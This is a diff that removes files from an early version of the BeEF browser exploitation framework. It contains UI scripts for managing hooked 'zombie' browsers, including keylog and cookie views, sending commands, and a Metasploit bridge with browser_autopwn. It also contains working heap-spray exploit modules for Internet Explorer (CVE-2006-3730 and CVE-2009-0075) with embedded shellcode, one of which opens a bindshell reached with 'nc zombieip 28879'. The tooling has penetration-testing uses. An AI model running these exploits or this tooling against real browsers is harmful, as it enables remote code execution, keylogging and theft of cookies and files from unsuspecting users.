var reverser = function(pos){ return transition(1-Effect.Transitions.pulse(pos)) };
reverser.bind(transition);
return new Effect.Opacity(element,
Object.extend(Object.extend({ duration: 3.0, from: 0,
afterFinishInternal: function(effect) { effect.element.setStyle({opacity: oldOpacity}); }
}, options), {transition: reverser}));
}
Effect.Fold = function(element) {
element = $(element);
var oldStyle = {
top: element.style.top,
left: element.style.left,
width: element.style.width,
height: element.style.height };
Element.makeClipping(element);
return new Effect.Scale(element, 5, Object.extend({
scaleContent: false,
scaleX: false,
afterFinishInternal: function(effect) {
new Effect.Scale(element, 1, {
scaleContent: false,
scaleY: false,
afterFinishInternal: function(effect) {
effect.element.hide();
effect.element.undoClipping();
effect.element.setStyle(oldStyle);
} });
}}, arguments[1] || {}));
};
['setOpacity','getOpacity','getInlineOpacity','forceRerendering','setContentZoom',
'collectTextNodes','collectTextNodesIgnoreClass','childrenWithClassName'].each(
function(f) { Element.Methods[f] = Element[f]; }
);
Element.Methods.visualEffect = function(element, effect, options) {
s = effect.gsub(/_/, '-').camelize();
effect_class = s.charAt(0).toUpperCase() + s.substring(1);
new Effect[effect_class](element, options);
return $(element);
};
Element.addMethods();

30
js/log.js
View File

@@ -1,30 +0,0 @@
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
function refreshlog() {
new Ajax.Updater('logdata', 'logcontrol.php?action=refresh', {asynchronous:true});
update_log_div('logdyn', 'summary');
}
function clearlog() {
new Ajax.Updater('logdata', 'logcontrol.php?action=clear', {asynchronous:false});
refreshlog();
}
function update_log_div(div, action) {
new Ajax.Updater(div, 'logcontrol.php?action=' + action, {asynchronous:true});
}
// --[ LOG CLASS
var Log = Class.create();
Log.prototype = {
initialize: function(frequency) {
this.version = '0.1',
this.authors = 'Wade Alcorn <wade@bindshell.net>',
this.frequency = frequency
},
heartbeat: function() {
update_log_div('logdyn', 'summary');
}
}

25
js/module.js
View File

@@ -1,25 +0,0 @@
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
// --[ ZOMBIELIST CLASS
var Module = Class.create();
Module.prototype = {
initialize: function(frequency) {
this.version = '0.1',
this.authors = 'Wade Alcorn <wade@bindshell.net>',
this.frequency = frequency,
this.id = 0;
},
heartbeat: function() {
new Ajax.Updater('module_results_section', 'get_module_details.php?action=get&result_id=' + this.id, {asynchronous:true});
},
delete_results: function() {
new Ajax.Updater('module_results_section', 'get_module_details.php?action=delete&result_id=' + this.id, {asynchronous:true});
this.heartbeat();
},
set_results_id: function(id) {
this.id = id;
}
}

115
js/msf.js
View File

@@ -1,115 +0,0 @@
// Javascript for BeefSploit modules
// By Ryan Linn (sussurro@happypacket.net)
// Excuse the mess, we are remodeling
var exploit_delay = 20000;
// --[ MSF GET EXPLOIT LIST
// get the list of exploits
function msf_get_exploit_list() {
url = 'action=getexploits';
msf_request(url, 'exploits', msf_get_payload_list);
}
// --[ MSF GET PAYLOAD LIST
// get relevant payload list
function msf_get_payload_list() {
url = 'action=getpayloads&exploit=' + $('exploit').value;
msf_request(url, 'payloads', msf_get_options);
}
// --[ MSG GET OPTIONS
// get relevant options for exploit and payload
function msf_get_options() {
url = 'action=getoptions&exploit=' + $('exploit').value + "&payload=" + $('payload').value;
msf_request(url, 'options', null);
}
// --[ MSF REQUEST
// generic request for msf data and actions
function msf_request(param_string, update_div, on_success_function) {
new Ajax.Request('msf.php?' + param_string,
{
method:'get',
onSuccess: function(transport){
// update div
if( (update_div != undefined) && (update_div != null) ) {
$(update_div).innerHTML = transport.responseText;
}
// onsuccess fuction
if( (on_success_function != undefined) && (on_success_function != null) ) {
on_success_function(transport.responseText);
}
},
asynchronous:true
});
}
// --[ MSF EXPLOIT
// after a delay direct selected zombies to the exploit
function msf_exploit(responseText) {
window.setTimeout('Element.Methods.construct_code("' + responseText + '")', exploit_delay);
}
function msf_callAuxiliary() {
opts = form_to_params();
url = 'action=auxiliary&' + opts;
msf_request(url, null, msf_exploit);
}
function msf_smb_challenge_capture() {
opts = form_to_params();
url = 'action=smbchallengecapture&' + opts;
msf_request(url, null, msf_exploit);
}
function msf_browser_autopwn() {
opts = form_to_params();
url = 'action=browserautopwn&' + opts;
msf_request(url, null, msf_exploit);
}
function msf_execute_module() {
opts = form_to_params();
url = 'action=exploit&' + opts;
msf_request(url, null, msf_exploit);
}
// --[ FORM TO PARAMS
// convert the form to a URL params string and return it
function form_to_params() {
var opts = "";
for(i = 0; i < document.myform.elements.length; i++) {
if(document.myform.elements[i].name != "" && document.myform.elements[i].value != "") {
if(document.myform.elements[i].type == "checkbox" && document.myform.elements[i].checked == false) {
continue;
}
if(i > 0 ) {
opts = opts + "&";
}
opts = opts + document.myform.elements[i].name + "=";
opts = opts + document.myform.elements[i].value;
}
}
return opts;
}

2006
js/prototype.js vendored
View File

File diff suppressed because it is too large Load Diff

47
js/scriptaculous.js
View File

@@ -1,47 +0,0 @@
// Copyright (c) 2005 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
//
// Permission is hereby granted, free of charge, to any person obtaining
// a copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to
// permit persons to whom the Software is furnished to do so, subject to
// the following conditions:
//
// The above copyright notice and this permission notice shall be
// included in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
// NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
// LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
// OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
// WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
var Scriptaculous = {
Version: '1.6.2',
require: function(libraryName) {
// inserting via DOM fails in Safari 2.0, so brute force approach
document.write('<script type="text/javascript" src="'+libraryName+'"></script>');
},
load: function() {
if((typeof Prototype=='undefined') ||
(typeof Element == 'undefined') ||
(typeof Element.Methods=='undefined') ||
parseFloat(Prototype.Version.split(".")[0] + "." +
Prototype.Version.split(".")[1]) < 1.5)
throw("script.aculo.us requires the Prototype JavaScript framework >= 1.5.0");
$A(document.getElementsByTagName("script")).findAll( function(s) {
return (s.src && s.src.match(/scriptaculous\.js(\?.*)?$/))
}).each( function(s) {
var path = s.src.replace(/scriptaculous\.js(\?.*)?$/,'');
var includes = s.src.match(/\?.*load=([a-z,]*)/);
(includes ? includes[1] : 'builder,effects,dragdrop,controls,slider').split(',').each(
function(include) { Scriptaculous.require(path+include+'.js') });
});
}
}
Scriptaculous.load();

292
js/slider.js
View File

@@ -1,292 +0,0 @@
// Copyright (c) 2005 Marty Haught, Thomas Fuchs
//
// See http://script.aculo.us for more info
//
// Permission is hereby granted, free of charge, to any person obtaining
// a copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to
// permit persons to whom the Software is furnished to do so, subject to
// the following conditions:
//
// The above copyright notice and this permission notice shall be
// included in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
// NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
// LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
// OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
// WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
if(!Control) var Control = {};
Control.Slider = Class.create();
// options:
// axis: 'vertical', or 'horizontal' (default)
//
// callbacks:
// onChange(value)
// onSlide(value)
Control.Slider.prototype = {
initialize: function(handle, track, options) {
var slider = this;
if(handle instanceof Array) {
this.handles = handle.collect( function(e) { return $(e) });
} else {
this.handles = [$(handle)];
}
this.track = $(track);
this.options = options || {};
this.axis = this.options.axis || 'horizontal';
this.increment = this.options.increment || 1;
this.step = parseInt(this.options.step || '1');
this.range = this.options.range || $R(0,1);
this.value = 0; // assure backwards compat
this.values = this.handles.map( function() { return 0 });
this.spans = this.options.spans ? this.options.spans.map(function(s){ return $(s) }) : false;
this.options.startSpan = $(this.options.startSpan || null);
this.options.endSpan = $(this.options.endSpan || null);
this.restricted = this.options.restricted || false;
this.maximum = this.options.maximum || this.range.end;
this.minimum = this.options.minimum || this.range.start;
// Will be used to align the handle onto the track, if necessary
this.alignX = parseInt(this.options.alignX || '0');
this.alignY = parseInt(this.options.alignY || '0');
this.trackLength = this.maximumOffset() - this.minimumOffset();
this.handleLength = this.isVertical() ?
(this.handles[0].offsetHeight != 0 ?
this.handles[0].offsetHeight : this.handles[0].style.height.replace(/px$/,"")) :
(this.handles[0].offsetWidth != 0 ? this.handles[0].offsetWidth :
this.handles[0].style.width.replace(/px$/,""));
this.active = false;
this.dragging = false;
this.disabled = false;
if(this.options.disabled) this.setDisabled();
// Allowed values array
this.allowedValues = this.options.values ? this.options.values.sortBy(Prototype.K) : false;
if(this.allowedValues) {
this.minimum = this.allowedValues.min();
this.maximum = this.allowedValues.max();
}
this.eventMouseDown = this.startDrag.bindAsEventListener(this);
this.eventMouseUp = this.endDrag.bindAsEventListener(this);
this.eventMouseMove = this.update.bindAsEventListener(this);
// Initialize handles in reverse (make sure first handle is active)
this.handles.each( function(h,i) {
i = slider.handles.length-1-i;
slider.setValue(parseFloat(
(slider.options.sliderValue instanceof Array ?
slider.options.sliderValue[i] : slider.options.sliderValue) ||
slider.range.start), i);
Element.makePositioned(h); // fix IE
Event.observe(h, "mousedown", slider.eventMouseDown);
});
Event.observe(this.track, "mousedown", this.eventMouseDown);
Event.observe(document, "mouseup", this.eventMouseUp);
Event.observe(document, "mousemove", this.eventMouseMove);
this.initialized = true;
},
dispose: function() {
var slider = this;
Event.stopObserving(this.track, "mousedown", this.eventMouseDown);
Event.stopObserving(document, "mouseup", this.eventMouseUp);
Event.stopObserving(document, "mousemove", this.eventMouseMove);
this.handles.each( function(h) {
Event.stopObserving(h, "mousedown", slider.eventMouseDown);
});
},
setDisabled: function(){
this.disabled = true;
},
setEnabled: function(){
this.disabled = false;
},
getNearestValue: function(value){
if(this.allowedValues){
if(value >= this.allowedValues.max()) return(this.allowedValues.max());
if(value <= this.allowedValues.min()) return(this.allowedValues.min());
var offset = Math.abs(this.allowedValues[0] - value);
var newValue = this.allowedValues[0];
this.allowedValues.each( function(v) {
var currentOffset = Math.abs(v - value);
if(currentOffset <= offset){
newValue = v;
offset = currentOffset;
}
});
return newValue;
}
if(value > this.range.end) return this.range.end;
if(value < this.range.start) return this.range.start;
return value;
},
setValue: function(sliderValue, handleIdx){
if(!this.active) {
this.activeHandleIdx = handleIdx || 0;
this.activeHandle = this.handles[this.activeHandleIdx];
this.updateStyles();
}
handleIdx = handleIdx || this.activeHandleIdx || 0;
if(this.initialized && this.restricted) {
if((handleIdx>0) && (sliderValue<this.values[handleIdx-1]))
sliderValue = this.values[handleIdx-1];
if((handleIdx < (this.handles.length-1)) && (sliderValue>this.values[handleIdx+1]))
sliderValue = this.values[handleIdx+1];
}
sliderValue = this.getNearestValue(sliderValue);
this.values[handleIdx] = sliderValue;
this.value = this.values[0]; // assure backwards compat
this.handles[handleIdx].style[this.isVertical() ? 'top' : 'left'] =
this.translateToPx(sliderValue);
this.drawSpans();
if(!this.dragging || !this.event) this.updateFinished();
},
setValueBy: function(delta, handleIdx) {
this.setValue(this.values[handleIdx || this.activeHandleIdx || 0] + delta,
handleIdx || this.activeHandleIdx || 0);
},
translateToPx: function(value) {
return Math.round(
((this.trackLength-this.handleLength)/(this.range.end-this.range.start)) *
(value - this.range.start)) + "px";
},
translateToValue: function(offset) {
return ((offset/(this.trackLength-this.handleLength) *
(this.range.end-this.range.start)) + this.range.start);
},
getRange: function(range) {
var v = this.values.sortBy(Prototype.K);
range = range || 0;
return $R(v[range],v[range+1]);
},
minimumOffset: function(){
return(this.isVertical() ? this.alignY : this.alignX);
},
maximumOffset: function(){
return(this.isVertical() ?
(this.track.offsetHeight != 0 ? this.track.offsetHeight :
this.track.style.height.replace(/px$/,"")) - this.alignY :
(this.track.offsetWidth != 0 ? this.track.offsetWidth :
this.track.style.width.replace(/px$/,"")) - this.alignY);
},
isVertical: function(){
return (this.axis == 'vertical');
},
drawSpans: function() {
var slider = this;
if(this.spans)
$R(0, this.spans.length-1).each(function(r) { slider.setSpan(slider.spans[r], slider.getRange(r)) });
if(this.options.startSpan)
this.setSpan(this.options.startSpan,
$R(0, this.values.length>1 ? this.getRange(0).min() : this.value ));
if(this.options.endSpan)
this.setSpan(this.options.endSpan,
$R(this.values.length>1 ? this.getRange(this.spans.length-1).max() : this.value, this.maximum));
},
setSpan: function(span, range) {
if(this.isVertical()) {
span.style.top = this.translateToPx(range.start);
span.style.height = this.translateToPx(range.end - range.start + this.range.start);
} else {
span.style.left = this.translateToPx(range.start);
span.style.width = this.translateToPx(range.end - range.start + this.range.start);
}
},
updateStyles: function() {
this.handles.each( function(h){ Element.removeClassName(h, 'selected') });
Element.addClassName(this.activeHandle, 'selected');
},
startDrag: function(event) {
if(Event.isLeftClick(event)) {
if(!this.disabled){
this.active = true;
var handle = Event.element(event);
var pointer = [Event.pointerX(event), Event.pointerY(event)];
var track = handle;
if(track==this.track) {
var offsets = Position.cumulativeOffset(this.track);
this.event = event;
this.setValue(this.translateToValue(
(this.isVertical() ? pointer[1]-offsets[1] : pointer[0]-offsets[0])-(this.handleLength/2)
));
var offsets = Position.cumulativeOffset(this.activeHandle);
this.offsetX = (pointer[0] - offsets[0]);
this.offsetY = (pointer[1] - offsets[1]);
} else {
// find the handle (prevents issues with Safari)
while((this.handles.indexOf(handle) == -1) && handle.parentNode)
handle = handle.parentNode;
this.activeHandle = handle;
this.activeHandleIdx = this.handles.indexOf(this.activeHandle);
this.updateStyles();
var offsets = Position.cumulativeOffset(this.activeHandle);
this.offsetX = (pointer[0] - offsets[0]);
this.offsetY = (pointer[1] - offsets[1]);
}
}
Event.stop(event);
}
},
update: function(event) {
if(this.active) {
if(!this.dragging) this.dragging = true;
this.draw(event);
// fix AppleWebKit rendering
if(navigator.appVersion.indexOf('AppleWebKit')>0) window.scrollBy(0,0);
Event.stop(event);
}
},
draw: function(event) {
var pointer = [Event.pointerX(event), Event.pointerY(event)];
var offsets = Position.cumulativeOffset(this.track);
pointer[0] -= this.offsetX + offsets[0];
pointer[1] -= this.offsetY + offsets[1];
this.event = event;
this.setValue(this.translateToValue( this.isVertical() ? pointer[1] : pointer[0] ));
if(this.initialized && this.options.onSlide)
this.options.onSlide(this.values.length>1 ? this.values : this.value, this);
},
endDrag: function(event) {
if(this.active && this.dragging) {
this.finishDrag(event, true);
Event.stop(event);
}
this.active = false;
this.dragging = false;
},
finishDrag: function(event, success) {
this.active = false;
this.dragging = false;
this.updateFinished();
},
updateFinished: function() {
if(this.initialized && this.options.onChange)
this.options.onChange(this.values.length>1 ? this.values : this.value, this);
this.event = null;
}
}

200
js/zombie.js
View File

@@ -1,200 +0,0 @@
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
function update_zombie_div(div, id, detail) {
new Ajax.Updater(div, 'get_zombie_details.php?zombie=' + id + '&detail=' + detail, {asynchronous:true});
}
// --[ ZOMBIE CLASS
var Zombie = Class.create();
Zombie.prototype = {
initialize: function(id, frequency) {
this.version = '0.1',
this.authors = 'Wade Alcorn <wade@bindshell.net>, Alexios Fakos <beef.20.alfa@spamgourmet.com>',
this.frequency = frequency,
this.id = id,
this.ip = '',
this.agent_image = '',
this.os_image = ''
},
create_button: function(highlighted) {
},
get_results: function() {
update_zombie_div('zombie_results_data', this.id, 'results');
},
get_keylog: function() {
update_zombie_div('keylog_data', this.id, 'keylog');
},
get_static_data: function() {
update_zombie_div('os_data', this.id, 'os');
update_zombie_div('browser_data', this.id, 'browser');
update_zombie_div('screen_data', this.id, 'screen');
update_zombie_div('cookie_data', this.id, 'cookie');
update_zombie_div('content_data', this.id, 'content');
update_zombie_div('loc_data', this.id, 'loc');
update_zombie_div('keylog_data', this.id, 'keylog');
update_zombie_div('zombie_results_data', this.id, 'results');
},
set_id: function(zombie) {
this.id = zombie;
this.get_static_data();
this.get_results();
this.get_keylog();
element = Builder.node('div',{id:'zombie_header'},[
Builder.node('img',{src:'/beef/images/' + this.agent_image,border:"0",height:"16",width:"16"}),
Builder.node('img',{src:'/beef/images/' + this.os_image,border:"0",height:"16",width:"16"}),
" " + this.ip
]);
$('zombie_icons').innerHTML = "";
$('zombie_icons').appendChild(element);
},
heartbeat: function() {
this.get_results();
this.get_keylog();
}
}
// --[ ZOMBIELIST CLASS
var ZombieList = Class.create();
ZombieList.prototype = {
initialize: function(frequency) {
this.version = '0.1',
this.authors = 'Wade Alcorn <wade@bindshell.net>, Alexios Fakos <beef.20.alfa@spamgourmet.com>',
this.frequency = frequency,
this.zombies = new Array();
this.selected_zombies = new Array();
this.zombie_data = new Array();
this.zombie_ids = new Array();
this.new_zombies = new Array();
this.expired_zombies = new Array();
this.current_zombie = 'none';
this.zombie = new Zombie(this.current_zombie, this.frequency);
},
update: function() {
var x = new Ajax.Request(
'get_zombie_details.php?zombie=all&detail=list',
{
method: 'get',
asynchronous: false,
evalScripts: false,
// parameters: 'func=' + func + '&zombie=' + this.zombie
}
);
var raw_zom_id_str = x.transport.responseText;
if(raw_zom_id_str.match(/none/)) {
$('zombiesdyn').innerHTML = "No Zombies Available";
return;
} else if (this.zombie_ids.length == 0) {
$('zombiesdyn').innerHTML = "";
}
zom_id_arr = raw_zom_id_str.split(',');
this.new_zombies = diff(zom_id_arr, this.zombie_ids);
this.expired_zombies = diff(this.zombie_ids, zom_id_arr);
this.expired_zombies = this.expired_zombies.unique();
this.zombie_ids = this.zombies.concat(zom_id_arr);
this.zombie_ids = this.zombie_ids.unique();
for(var i = 0; i < this.new_zombies.length; i++) {
this.add(this.new_zombies[i]);
}
for(var i = 0; i < this.expired_zombies.length; i++) {
$('zombiesdyn').removeChild(this.zombie_data[this.expired_zombies[i]]['button_element']);
}
},
add: function(zombie_id) {
this.zombie_data[zombie_id] = new Array();
var x = new Ajax.Request(
'get_zombie_details.php?zombie=' + zombie_id + '&detail=metadata',
{
method: 'get',
asynchronous: false,
evalScripts: false,
}
);
var raw_zom_id_str = x.transport.responseText;
zombie_details_arr = raw_zom_id_str.split(',');
this.zombie_data[zombie_id]['ip'] = zombie_details_arr[0];
this.zombie_data[zombie_id]['agent_image'] = zombie_details_arr[1];
this.zombie_data[zombie_id]['os_image'] = zombie_details_arr[2];
element = Builder.node('div',{id:'zombies'},[
Builder.node('a',{href:"javascript:select_zombie('" + zombie_id + "')"},[
Builder.node('img',{src:'/beef/images/' + this.zombie_data[zombie_id]['agent_image'],align:"top",border:"0",height:"12",width:"12"}),
Builder.node('img',{src:'/beef/images/' + this.zombie_data[zombie_id]['os_image'],align:"top",border:"0",height:"12",width:"12"}),
Builder.node('div',{id:'zombietext'},[this.zombie_data[zombie_id]['ip']]),
]),
]);
this.zombie_data[zombie_id]['button_element'] = element;
$('zombiesdyn').appendChild(element);
},
highlight_button: function(zombie_id) {
this.zombie_data[zombie_id]['button_element'].style.backgroundColor='#CCCCCC'
},
unhighlight_button: function(zombie_id) {
this.zombie_data[zombie_id]['button_element'].style.backgroundColor='#FFFFFF'
},
select_zombie: function(zombie_id) {
if(this.selected_zombies.indexOf(zombie_id) < 0) {
this.selected_zombies.push(zombie_id);
this.highlight_button(zombie_id);
} else {
this.selected_zombies.splice(this.selected_zombies.indexOf(zombie_id),1);
this.unhighlight_button(zombie_id);
}
},
send_code: function(code) {
if(!this.selected_zombies.length) {
beef_error('No Zombie Selected. Select zombie(s) in the sidebar');
}
// this is a work-around for a bug in Ajax.Updater - it doens't like '==' in a get param
if(decode64(code).length%3 == 1) {
tmp_code = decode64(code);
tmp_code += ";";
code = encode64(tmp_code);
}
this.selected_zombies.each( function(id) {
var params = 'data='+code;
new Ajax.Updater('module_status', 'send_cmds.php?action=cmd&zombie=' + id, {method:'post',parameters:params,asynchronous:false});
});
},
heartbeat: function() {
this.update();
this.zombie.heartbeat();
// update menu
update_zombie_div('zombie_menu', 'none', 'menu');
},
set_current_zombie: function(zombie_id) {
this.current_zombie = zombie_id;
this.zombie.ip = this.zombie_data[zombie_id]['ip'];
this.zombie.agent_image = this.zombie_data[zombie_id]['agent_image'];
this.zombie.os_image = this.zombie_data[zombie_id]['os_image'];
this.zombie.set_id(zombie_id);
},
get_html_buttons: function() {
update_zombie_div('zombiesdyn', this.current_zombie, 'buttons');
},
clear_current_zombie_results: function() {
update_zombie_div('zombie_results_data', this.current_zombie, 'deleteresults');
}
}

62
modules/browser/cve_2006_3730/index.php
View File

@@ -1,62 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: the following is the boiler plate from the exploit
..::[ jamikazu presents ]::..
Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day)
Works on all Windows XP versions including SP2
Author: jamikazu
Mail: jamikazu@gmail.com
Bug discovered by Computer H D Moore (http://www.metasploit.com)
Credit: metasploit, SkyLined
invokes calc.exe if successful
-->
<script>
function get_b64_code_2006_3730() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('CVE-2006-3730', get_b64_code_2006_3730());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_2006_3730());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">CVE-2006-3730 (MS06-057)</div>
This module will launch calc.exe (Calculater) on Microsoft Windows. A vulnerability in
Microsoft Internet Explorer WebViewFolderIcon (setSlice) is exploited.<br><br>
<div id="module_subsection">
<form name="myform">
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

1
modules/browser/cve_2006_3730/name.txt
View File

@@ -1 +0,0 @@
IE6 setSlice calc.exe (CVE-2006-3730)

38
modules/browser/cve_2006_3730/template.js
View File

@@ -1,38 +0,0 @@
var heapSprayToAddress = 0x05050505;
var payLoadCode = unescape(
"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
"%uFF57%u63E7%u6C61%u0063");
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u0505%u0505");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
for ( i = 0 ; i < 128 ; i++)
{
try{
var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );
}catch(e){}
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}

80
modules/browser/cve_2009_0075/index.php
View File

@@ -1,80 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: http://www.milw0rm.com/exploits/8079
BeEF: the following is the boiler plate from the exploit
Internet Explorer 7 Uninitialized Memory Corruption Exploit
http://www.microsoft.com/technet/security/bulletin/MS09-002.mspx
Abyssec Inc Public Exploits 2009/2/18
this Exploit is based on N/A PoC in Milw0rm but The PoC was really simple to
exploit this PoC can be exploit on DEP-Enabled System As well using .Net
Shellcode trick or etc mayve i write Dep-Enabled version too And also
i should notice , this code can modify to be more reliable ..
Feel free to visit us at : www.Abyssec.com
to contact me directly use : admin@abyssec.com
Note : Tested and Worked On XP SP2 please wait for another version
// Skyland win32 bindshell (28876/tcp) shellcode
// If you want an evill Shellcode go ahead !!!
-->
<script>
function get_b64_code_2009_0075() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
// replace sections of the code with user input
b64code = b64replace(b64code, "REGEXP", document.cmd_form.regexp.value);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('CVE-2009-0075 (MS09-002)', get_b64_code_2009_0075());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_2009_0075());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">CVE-2009-0075 (MS09-002)</div>
Internet Explorer 7 Uninitialized Memory Corruption Exploit. This module targets
Windows XP SP2. Successful exploitation will start a bindshell listening on port
28879.<br><br>
The following command will connect to the listening bindshell:
<pre>
nc zombieip 28879
</pre>
<div id="module_subsection">
<form name="cmd_form">
<div id="module_subsection_header">UserAgent Regexp</div>
<input type="text" name="regexp" value="/.*Windows.*/"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

1
modules/browser/cve_2009_0075/name.txt
View File

@@ -1 +0,0 @@
XP SP2 IE Bindshell (CVE-2009-0075)

35
modules/browser/cve_2009_0075/template.js
View File

@@ -1,35 +0,0 @@
if(navigator.userAgent.match(REGEXP)) {
var shellcode=unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
var array = new Array();
//Don't need change but for execute time you can change ;)
var calc = 0x100000-(shellcode.length*2+0x01020);
// Spray or Not :-??
var point = unescape("%u0D0D%u0D0D");
while(point.length<calc) { point+=point;}
var sec = point.substring(0,calc/2);
delete point;
for(i=0; i<0xD0; i++) {
array[i] = sec + shellcode;
}
// N/A Code
CollectGarbage();
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<500;x++) a1.push(document.createElement("img"));
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
}

52
modules/browser/cve_2009_0137/index.php
View File

@@ -1,52 +0,0 @@
<?php
// Copyright (c) 2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: the following details refer to the source of this port
Billy (BK) Rios
Blog: Stealing More Files with Safari
http://xs-sniper.com/blog/2009/02/13/stealing-more-files-with-safari/
-->
<script>
function get_b64_code_2009_0137() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
